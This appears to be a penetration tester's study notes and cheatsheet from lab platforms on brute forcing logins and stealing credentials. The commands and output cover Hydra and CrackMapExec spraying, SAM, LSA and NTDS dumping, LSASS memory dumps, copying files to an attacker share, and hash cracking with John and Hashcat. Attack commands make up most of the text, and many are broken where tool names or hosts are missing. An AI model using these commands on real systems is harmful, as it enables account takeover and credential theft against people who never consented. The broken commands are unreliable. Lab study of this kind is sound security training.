Brute Forcing/ Password Cracking

Hash Identifier

hash-identifier somehash
hashid hash1.txt

Online Hash Crackers

Default Credentials

base64 decoder

base64 -d encoded text

Windows Password Cracking

Dumping SAM files

C:\WINDOWS\system32> reg.exe save hklm\sam C:\

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\system C:\

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\security C:\

The operation completed successfully.

Dumping Hashes with Impacket's

One incredibly useful tool we can use to dump the hashes offline is Impacket's Impacket can be found on most modern penetration testing distributions. We can check for it by using locate on a Linux-based system:


ammartiger@htb[/htb]$ locate secretsdump 

Using is a simple process. All we must do is run using Python, then specify each hive file we retrieved from the target host.


ammartiger@htb[/htb]$ python3 /usr/share/doc/python3-impacket/examples/ -sam -security -system LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] NL$KM 
 0000   D7 0A F4 B9 1E 3E 77 34  94 8F C4 7D AC 8F 60 69   .....>w4...}..`i
 0010   52 E1 2B 74 FF B2 08 5F  59 FE 32 19 D6 A7 2C F8   R.+t..._Y.2...,.
 0020   E2 A4 80 E0 0F 3D F8 48  44 98 87 E1 C9 CD 4B 28   .....=.HD.....K(
 0030   9B 7B 8B BF 3D 59 DB 90  D8 C7 AB 62 93 30 6A 42   .{..=Y.....b.0jB
[*] Cleaning up... 

Here we see that secretsdump successfully dumps the local SAM hashes and would've also dumped the cached domain logon information if the target was domain-joined and had cached credentials present in hklm\security. Notice the first step secretsdump executes is targeting the system bootkey before proceeding to dump the LOCAL SAM hashes. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database, which is why it is important for us to have copies of the registry hives we discussed earlier in this section. Notice at the top of the output:

Dumping local SAM hashes (uid:rid:lmhash:nthash)

This tells us how to read the output and what hashes we can crack. Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS.

Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords. It may be beneficial to make a note of each user, so we know which password is associated with which user account.

Generating Word list with Crunch

crunch 3 3 0123456789ABCDEF -o 3digits.txt
  • 3 the first number is the minimum length of the generated password

  • 3 the second number is the maximum length of the generated password

  • 0123456789ABCDEF is the character set to use to generate the passwords

  • -o 3digits.txt saves the output to the 3digits.txt file


Http brute force with Hydra

hydra -C tomcat-betterdefaultpasslist.txt -s 8080 http-get /manager/html


hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid" -V -I -t 4

Hydra Post Form

hydra -l '' -P 3digits.txt -f -v MACHINE_IP http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
  • -l '' indicates that the login name is blank as the security lock only requires a password

  • -P 3digits.txt specifies the password file to use

  • -f stops Hydra after finding a working password

  • -v provides verbose output and is helpful for catching errors

  • MACHINE_IP is the IP address of the target

  • http-post-form specifies the HTTP method to use

  • "/login.php:pin=^PASS^:Access denied" has three parts separated by : /login.php is the page where the PIN code is submitted pin=^PASS^ will replace ^PASS^ with values from the password list Access denied indicates that invalid passwords will lead to a page that contains the text “Access denied”

  • -s 8000 indicates the port number on the target

Hydra SSH brute force

└──╼ [★]$ hydra -L users -P passwords ssh://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2024-04-07 15:29:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21112 login tries (l:104/p:203), ~1320 tries per task
[DATA] attacking ssh://
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 20936 to do in 01:58h, 16 active
[22][ssh] host:   login: dennis   password: rockstar

John the Ripper

SSH key

ssh2john key.pem >hash.txt

Simple Format to crack hashes

john --wordlist=[path to wordlist] [path to file]

To list supported hash types by John

john --list=formats

Cracking Hashes

john hash1.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-md5
john hash2.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-sha1
john hash3.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-sha256
john hash4.txt -w=/usr/share/wordlists/rockyou.txt --format=whirlpool
john ntlm.txt -w=/usr/share/wordlists/rockyou.txt --format=nt

Linux Password cracking

unshadow [path to passwd] [path to shadow]
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt

Single Crack Mode

John also has another mode, called Single Crack mode. In this mode, John uses only the information provided in the username, to try and work out possible passwords heuristically, by slightly changing the letters and numbers contained within the username. To use single crack mode, we use roughly the same syntax that we've used to so far, for example if we wanted to crack the password of the user named "Mike", using single mode, we'd use:

john --single --format=[format] [path to file]

If you're cracking hashes in single crack mode, you need to change the file format that you're feeding john for it to understand what data to create a wordlist from. You do this by prepending the hash with the username that the hash belongs to, so according to the above example- we would change the file hashes.txt





Zip Hash cracking

zip2john [options] [zip file] > [output file]
john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt

Rar Password Cracking

rar2john rarfile.rar > rar_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt rar_hash.txt

gpg Encryption

GnuPG or GPG is an Open Source implementation of PGP from the GNU project. You may need to use GPG to decrypt files in CTFs. With PGP/GPG, private keys can be protected with passphrases in a similar way to SSH private keys. If the key is passphrase protected, you can attempt to crack this passphrase using John The Ripper and gpg2john.

Import gpg key

gpg --import tryhackme.key

Decrypt Message

gpg --decrypt message.gpg 

Cracking groups.xml file (Windows server 2008)

Viewing the downloaded file, we get the username." userName="active.htb\SVC_TGS"

└─$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

Now lets decrypt it with gpp-decrypt

└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ


Let's check if we have access through winrm.

└─$ crackmapexec winrm -u "svc-alfresco" -p "s3rvice"  
SMB    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP    5985   FOREST           [*]
WINRM    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice 
└──╼ [★]$ crackmapexec winrm -u users -p passwords
SMB    5985   WINSRV           [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
HTTP    5985   WINSRV           [*]
WINRM    5985   WINSRV           [-] WINSRV\john:123456
WINRM    5985   WINSRV           [-] WINSRV\john:12345
WINRM    5985   WINSRV           [-] WINSRV\john:123456789
WINRM    5985   WINSRV           [-] WINSRV\john:batman
WINRM    5985   WINSRV           [-] WINSRV\john:password
WINRM    5985   WINSRV           [-] WINSRV\john:iloveyou
WINRM    5985   WINSRV           [-] WINSRV\john:princess
WINRM    5985   WINSRV           [+] WINSRV\john:november (Pwn3d!)


We can then use evil-winrm to connect to our target

└──╼ [★]$ evilwinrm -i -u john -p november
bash: evilwinrm: command not found
└──╼ [★]$ evil-winrm -i -u john -p november

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\john\Documents> 

SSH Bruteforcing CrackMapExec

└──╼ [★]$ crackmapexec ssh -u users -p passwords
SSH    22     [*] SSH-2.0-OpenSSH_for_Windows_7.7
SSH    22     [-] john:123456 Authentication failed.
SSH    22     [-] john:12345 Authentication failed.
SSH    22     [-] dennis:november Authentication failed.
SSH    22     [-] dennis:1234567 Authentication failed.
SSH    22     [-] dennis:12345678 Authentication failed.
SSH    22     [+] dennis:rockstar 

Listing Shares with crackmapexec

└──╼ [★]$ crackmapexec smb -u john -p november --shares
SMB    445    WINSRV           [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB    445    WINSRV           [+] WINSRV\john:november 
SMB    445    WINSRV           [+] Enumerated shares
SMB    445    WINSRV           Share           Permissions     Remark
SMB    445    WINSRV           -----           -----------     ------
SMB    445    WINSRV           ADMIN$                          Remote Admin
SMB    445    WINSRV           C$                              Default share
SMB    445    WINSRV           CASSIE                          
SMB    445    WINSRV           IPC$            READ            Remote IPC

We can then use smbclient to view the share

You can also use MSF to bruteforce SMB.

Password Mutations

Considering that many people want to keep their passwords as simple as possible despite password policies, we can create rules for generating weak passwords. Based on statistics provided by WPengine, most password lengths are not longer than ten characters. So what we can do is to pick specific terms that are at least five characters long and seem to be the most familiar to the users, such as the names of their pets, hobbies, preferences, and other interests. If the user chooses a single word (such as the current month), adds the current year, followed by a special character, at the end of their password, we would reach the ten-character password requirement. Considering that most companies require regular password changes, a user can modify their password by just changing the name of a month or a single number, etc. Let's use a simple example to create a password list with only one entry.

Password List

[!bash!]$ cat password.list


We can use a very powerful tool called Hashcat to combine lists of potential names and labels with specific mutation rules to create custom wordlists. To become more familiar with Hashcat and discover the full potential of this tool, we recommend the module Cracking Passwords with Hashcat. Hashcat uses a specific syntax for defining characters and words and how they can be modified. The complete list of this syntax can be found in the official documentation of Hashcat. However, the ones listed below are enough for us to understand how Hashcat mutates words.




Do nothing.


Lowercase all letters.


Uppercase all letters.


Capitalize the first letter and lowercase others.


Replace all instances of X with Y.


Add the exclamation character at the end.

Each rule is written on a new line which determines how the word should be mutated. If we write the functions shown above into a file and consider the aspects mentioned, this file can then look like this:

Hashcat Rule File

[!bash!]$ cat custom.rule

c so0
c sa@
c sa@ so0
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

Hashcat will apply the rules of custom.rule for each word in password.list and store the mutated version in our mut_password.list accordingly. Thus, one word will result in fifteen mutated words in this case.

Generating Rule-based Wordlist

[!bash!]$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
[!bash!]$ cat mut_password.list


Hashcat and John come with pre-built rule lists that we can use for our password generating and cracking purposes. One of the most used rules is best64.rule, which can often lead to good results. It is important to note that password cracking and the creation of custom wordlists is a guessing game in most cases. We can narrow this down and perform more targeted guessing if we have information about the password policy and take into account the company name, geographical region, industry, and other topics/words that users may select from to create their passwords. Exceptions are, of course, cases where passwords are leaked and found.

Hashcat Existing Rules

[!bash!]$ ls /usr/share/hashcat/rules/

best64.rule                  specific.rule
combinator.rule              T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
d3ad0ne.rule                 T0XlC-insert_space_and_special_0_F.rule
dive.rule                    T0XlC-insert_top_100_passwords_1_G.rule
generated2.rule              T0XlC.rule
generated.rule               T0XlCv1.rule
hybrid                       toggles1.rule
Incisive-leetspeak.rule      toggles2.rule
InsidePro-HashManager.rule   toggles3.rule
InsidePro-PasswordsPro.rule  toggles4.rule
leetspeak.rule               toggles5.rule
oscommerce.rule              unix-ninja-leetspeak.rule

Generating wordlist from a website with CEWL

We can now use another tool called CeWL to scan potential words from the company's website and save them in a separate list. We can then combine this list with the desired rules and create a customized password list that has a higher probability of guessing a correct password. We specify some parameters, like the depth to spider (-d), the minimum length of the word (-m), the storage of the found words in lowercase (--lowercase), as well as the file where we want to store the results (-w).

Generating Wordlists Using CeWL

[!bash!]$ cewl -d 4 -m 6 --lowercase -w inlane.wordlist
[!bash!]$ wc -l inlane.wordlist


Crowbar - another tool for bruteforcing

Works best for RDP brute forcing

└─$ crowbar -b rdp -U username.list -C password.list -s
2024-04-08 05:37:01 START
2024-04-08 05:37:01 Crowbar v0.4.2
2024-04-08 05:37:01 Trying

2024-04-08 05:42:21 RDP-SUCCESS : - chris:789456123


└─$ xfreerdp /v: /u:chris /p:789456123
[05:46:22:130] [67171:67172] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[05:46:22:130] [67171:67172] [WARN][com.freerdp.crypto] - CN = WINSRV
[05:46:27:555] [67171:67172] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[05:46:27:556] [67171:67172] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[05:46:27:629] [67171:67172] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[05:46:27:629] [67171:67172] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic V

Remote Dumping & LSA Secrets Considerations

With access to credentials with local admin privileges, it is also possible for us to target LSA Secrets over the network. This could allow us to extract credentials from a running service, scheduled task, or application that uses LSA secrets to store passwords.

ammartiger@htb[/htb]$ crackmapexec smb --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

SMB   445    WS01     [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB   445    WS01     [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB   445    WS01     [+] Dumping LSA secrets
SMB   445    WS01     WS01\worker:Hello123
SMB   445    WS01      dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
SMB   445    WS01     NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB   445    WS01     [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.secrets and /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cached

Dumping SAM Remotely

We can also dump hashes from the SAM database remotely.

ammartiger@htb[/htb]$ crackmapexec smb --local-auth -u bob -p HTB_@cademy_stdnt! --sam

SMB   445    WS01      [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB   445    WS01      [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB   445    WS01      [+] Dumping SAM hashes
SMB   445    WS01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB   445    WS01     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB   445    WS01     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB   445    WS01     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB   445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB   445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB   445    WS01     rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB   445    WS01     worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB   445    WS01     [+] Added 8 SAM hashes to the database

Password Cracking Cheatsheat

Connecting to Target



xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!

CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol.

evil-winrm -i <ip> -u user -p password

Uses Evil-WinRM to establish a Powershell session with a target.

ssh user@<ip>

Uses SSH to connect to a target using a specified user.

smbclient -U user \\\\<ip>\\SHARENAME

Uses smbclient to connect to an SMB share using a specified user.

python3 -smb2support CompData /home/<nameofuser>/Documents/

Uses to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.

Password Mutations



cewl -d 4 -m 6 --lowercase -w inlane.wordlist

Uses cewl to generate a wordlist based on keywords present on a website.

hashcat --force password.list -r custom.rule --stdout > mut_password.list

Uses Hashcat to generate a rule-based word list.

./username-anarchy -i /path/to/listoffirstandlastnames.txt

Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username.

curl -s | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt

Uses Linux-based commands curl, awk, grep and tee to download a list of file extensions to be used in searching for files that could contain passwords.

Remote Password Attacks



crackmapexec winrm <ip> -u user.list -p password.list

Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.

crackmapexec smb <ip> -u "user" -p "password" --shares

Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials.

hydra -L user.list -P password.list <service>://<ip>

Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.

hydra -l username -P password.list <service>://<ip>

Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.

hydra -L user.list -p password <service>://<ip>

Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.

hydra -C <user_pass.list> ssh://<IP>

Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.

crackmapexec smb <ip> --local-auth -u <username> -p <password> --sam

Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network.

crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa

Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way.

crackmapexec smb <ip> -u <username> -p <password> --ntds

Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network.

evil-winrm -i <ip> -u Administrator -H "<passwordhash>"

Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of Pass-The-Hash attack.

Windows Local Password Attacks



tasklist /svc

A command-line-based utility in Windows used to list running processes.

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Uses Windows command-line based utility findstr to search for the string "password" in many different file type.

Get-Process lsass

A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line.

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials.

pypykatz lsa minidump /path/to/lsassdumpfile

Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file.

reg.exe save hklm\sam C:\

Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system).

move \\<ip>\NameofFileShare

Uses move in Windows to transfer a file to a specified file share over the network.

python3 -sam -security -system LOCAL

Uses to dump password hashes from the SAM database.

vssadmin CREATE SHADOW /For=C:

Uses Windows command line based tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely.

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of C:.

Linux Local Password Attacks



for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core" ;done

Script that can be used to find .conf, .config and .cnf files on a Linux system.

for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib");do echo -e "\nFile: " $i; grep "user|password|pass" $i 2>/dev/null | grep -v "\#";done

Script that can be used to find credentials in specified file types.

for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man";done

Script that can be used to find common database files.

find /home/* -type f -name "*.txt" -o ! -name "*.*"

Uses Linux-based find command to search for text files.

for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share";done

Script that can be used to search for common file types used with scripts.

for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib|fonts|share|core" ;done

Script used to look for common types of documents.

cat /etc/crontab

Uses Linux-based cat command to view the contents of crontab in search for credentials.

ls -la /etc/cron.*/

Uses Linux-based ls -la command to list all files that start with cron contained in the etc directory.

grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

Uses Linux-based command grep to search the file system for key terms PRIVATE KEY to discover SSH keys.

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

Uses Linux-based grep command to search for the keywords PRIVATE KEY within files contained in a user's home directory.

grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

Uses Linux-based grep command to search for keywords ssh-rsa within files contained in a user's home directory.

tail -n5 /home/*/.bash*

Uses Linux-based tail command to search the through bash history files and output the last 5 lines.


Runs using python3.


Runs using bash.

python2.7 all

Runs with all modules using python2.7

ls -l .mozilla/firefox/ | grep default

Uses Linux-based command to search for credentials stored by Firefox then searches for the keyword default using grep.

cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .

Uses Linux-based command cat to search for credentials stored by Firefox in JSON.


Runs to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9.

python3 browsers

Runs browsers module using Python 3.

Cracking Passwords



hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt

Uses Hashcat to crack NTLM hashes using a specified wordlist.

hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show

Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output.

unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking.

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked.

hashcat -m 500 -a 0 md5-hashes.list rockyou.txt

Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file.

hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked

Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked. SSH.private > ssh.hash

Runs script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.

john ssh.hash --show

Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal. Protected.docx > protected-docx.hash

Runs against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash.

john --wordlist=rockyou.txt protected-docx.hash

Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash. PDF.pdf > pdf.hash

Runs script to convert a pdf file to a pdf has to be cracked.

john --wordlist=rockyou.txt pdf.hash

Runs John in conjunction with a wordlist to crack a pdf hash.

zip2john > zip.hash

Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash.

john --wordlist=rockyou.txt zip.hash

Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash.

bitlocker2john -i Backup.vhd > backup.hashes

Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes.

file GZIP.gzip

Uses the Linux-based file tool to gather file format information.

for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done

Script that runs a for-loop to extract files from an archive.

Last updated